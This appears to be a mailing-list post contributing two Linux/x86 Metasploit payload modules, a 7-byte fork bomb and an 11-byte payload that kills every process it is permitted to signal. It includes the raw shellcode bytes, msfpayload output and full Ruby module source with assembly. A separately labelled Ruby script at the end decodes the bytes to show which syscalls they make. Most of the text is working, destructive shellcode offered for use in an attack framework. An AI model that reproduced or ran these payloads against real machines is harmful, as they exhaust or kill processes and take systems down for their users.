Hey guys,

I just started playing around with Metasm earlier today (it's great!), and
drew up a couple of simple Linux/x86 payloads to test some of it out a bit.

I don't think these are really of interest for inclusion, but you're of course
welcome to them if they are.  I figure sending them can't hurt anything.

The first is a fork bomb in 7 bytes, and the other is kill(-1,9) in 11 bytes.
These are some things I did when I first started playing with shellcode:

http://www.milw0rm.com/shellcode/2805
http://www.milw0rm.com/shellcode/3446

And as you can see they're the same:

$ ./msfpayload linux/x86/forkbomb y
# linux/x86/forkbomb - 7 bytes
# http://www.metasploit.com
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, PrependSetreuid=false
"\x6a\x02\x58\xcd\x80\xeb\xf9"

$ ./msfpayload linux/x86/killall y
# linux/x86/killall - 11 bytes
# http://www.metasploit.com
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, PrependSetreuid=false
"\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80"


Quite cool.


msf > info linux/x86/forkbomb

       Name: Linux Fork Bomb (Metasm)
    Version: 1
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 40

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Description:
  This payload launches a fork bomb, i.e. 'for (;;) fork()'


msf > info linux/x86/killall

       Name: Linux Kill All Processes (Metasm)
    Version: 1
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 44

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Description:
  This payload sends SIGKILL to all of the processes we are permitted
  to send to via kill(-1, 9)



Thanks,
Kris Katterjohn

require 'msf/core'
require 'metasm'

module Metasploit3

        include Msf::Payload::Single
        include Msf::Payload::Linux

        def initialize(info = {})
                super(update_info(info,
                        'Name'        => 'Linux Fork Bomb (Metasm)',
                        'Version'     => '1',
                        'Description' => %q{
                                This payload launches a fork bomb,
                                i.e. 'for (;;) fork()'
                        },
                        'Author'      => 'Kris Katterjohn <[EMAIL PROTECTED]>',
                        'License'     => MSF_LICENSE,
                        'Platform'    => 'linux',
                        'Arch'        => ARCH_X86,
                        'Payload'     =>
                                {
                                        'Offsets' => {},
                                        'Assembly' => <<EOA
; http://milw0rm.com/shellcode/2805

_start:
        push 2
        pop eax
        int 0x80
        jmp _start
EOA
                                }
                ))
        end
end

require 'msf/core'
require 'metasm'

module Metasploit3

        include Msf::Payload::Single
        include Msf::Payload::Linux

        def initialize(info = {})
                super(update_info(info,
                        'Name'        => 'Linux Kill All Processes (Metasm)',
                        'Version'     => '1',
                        'Description' => %q{
                                This payload sends SIGKILL to all of the processes
                                we are permitted to send to via kill(-1, 9)
                        },
                        'Author'      => 'Kris Katterjohn <[EMAIL PROTECTED]>',
                        'License'     => MSF_LICENSE,
                        'Platform'    => 'linux',
                        'Arch'        => ARCH_X86,
                        'Payload'     =>
                                {
                                        'Offsets' => {},
                                        'Assembly' => <<EOA
; http://milw0rm.com/shellcode/3446

        push 37
        pop eax
        push -1
        pop ebx
        push 9
        pop ecx
        int 0x80
EOA
                                }
                ))
        end
end
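
For triage of the two byte strings in the msfpayload output above, here is an added example (not part of the original post or of Metasploit) that decodes the four instruction forms they use and reports which Linux i386 system call each one makes. The names trace_syscalls, FORKBOMB and KILLALL are made up for this sketch; the byte strings are copied from the post.

```ruby
# Added example: decodes only the instruction forms the two payloads use.
# Names below (trace_syscalls, FORKBOMB, KILLALL) are made up for this sketch.
SYSCALLS = { 2 => 'fork', 37 => 'kill' }.freeze   # Linux i386 syscall numbers
REGS = %i[eax ecx edx ebx esp ebp esi edi].freeze # order of the pop r32 opcodes

FORKBOMB = "\x6a\x02\x58\xcd\x80\xeb\xf9".b                   # bytes from the post
KILLALL  = "\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80".b   # bytes from the post

def signed8(byte)
  byte >= 0x80 ? byte - 0x100 : byte
end

# Linear pass over the bytes: tracks constants moved through push/pop, records
# every int 0x80 with its register state, and notes backward jumps (loops).
def trace_syscalls(code)
  bytes = code.bytes
  stack = []
  regs = {}
  calls = []
  loops = []
  pc = 0
  while pc < bytes.size
    op = bytes[pc]
    case op
    when 0x6a                 # push imm8, sign-extended to 32 bits
      stack.push(signed8(bytes.fetch(pc + 1)))
      pc += 2
    when 0x58..0x5f           # pop r32
      regs[REGS[op - 0x58]] = stack.pop
      pc += 1
    when 0xcd                 # int imm8; only the Linux syscall gate is handled
      raise ArgumentError, 'not int 0x80' unless bytes.fetch(pc + 1) == 0x80
      nr = regs[:eax]
      calls << { nr: nr, name: SYSCALLS.fetch(nr, 'unknown'),
                 args: [regs[:ebx], regs[:ecx]].compact }
      pc += 2
    when 0xeb                 # jmp rel8, relative to the next instruction
      target = pc + 2 + signed8(bytes.fetch(pc + 1))
      loops << target if target <= pc
      pc += 2
    else
      raise ArgumentError, format('unsupported opcode 0x%02x at offset %d', op, pc)
    end
  end
  { calls: calls, loops_to: loops }
end

if __FILE__ == $PROGRAM_NAME
  { 'forkbomb' => FORKBOMB, 'killall' => KILLALL }.each do |name, code|
    puts "#{name}: #{trace_syscalls(code).inspect}"
  end
end
```

A syscall followed by a jump back to offset 0 is the 'for (;;) fork()' loop from the description, and the second trace shows the kill(-1, 9) arguments in ebx and ecx.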
